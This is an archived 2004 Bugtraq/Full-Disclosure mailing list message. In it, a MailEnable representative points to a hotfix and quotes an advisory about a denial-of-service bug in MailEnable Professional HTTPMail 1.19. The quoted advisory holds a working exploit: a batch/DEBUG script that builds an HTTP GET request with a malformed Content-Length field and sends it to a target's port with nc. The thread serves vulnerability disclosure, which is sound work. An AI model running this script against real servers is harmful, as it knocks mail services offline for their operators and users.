[36047] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

RE: [Full-Disclosure] DOS@MEHTTPS

daemon@ATHENA.MIT.EDU (Peter Fregon)
Mon Aug 9 13:53:42 2004

Reply-To: <peter@mailenable.com>
From: "Peter Fregon" <peter@mailenable.com>
To: <CoolICE@china.com>
Cc: "'bugtraq'" <bugtraq@securityfocus.com>,
        "'full-disclosure'" <full-disclosure@lists.netsys.com>,
        "'list'" <list@securiteam.com>
Date: Mon, 9 Aug 2004 17:56:58 +1000
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
In-Reply-To: <Sa959197848582.18918@mx2>
Message-ID: <49908B3798F8414B8FC7CEDBD6356C.MAI@mailenable.com>

Thanks,

A hotfix for this bug is available from:

http://www.mailenable.com/hotfix


Peter Fregon
MailEnable Pty. Ltd.


-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of CoolICE
Sent: Monday, 2 August 2004 5:19 PM
To: suggest
Cc: bugtraq; full-disclosure; list
Subject: [Full-Disclosure] DOS@MEHTTPS

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:	MailEnable Professional HTTPMail 
:Vendors:	http://www.mailenable.com/
:Version:	1.19
:Platforms:	Windows
:Bug:		D.O.S
:Date:		2004-07-30
:Author:	CoolICE
:E_mail:	CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof ;set PORT=8080 ;if not
'%2'=='' set PORT=%2 ;for %%n in (nc.exe) do if not exist %%~$PATH:n if not
exist nc.exe echo Need nc.exe&&goto :eof ;DEBUG < %~s0 ;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q


:run
nc %1 %PORT% < http.tmp
del http.tmp

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

home	help	back	first	fref	pref	prev	next	nref	lref	last	post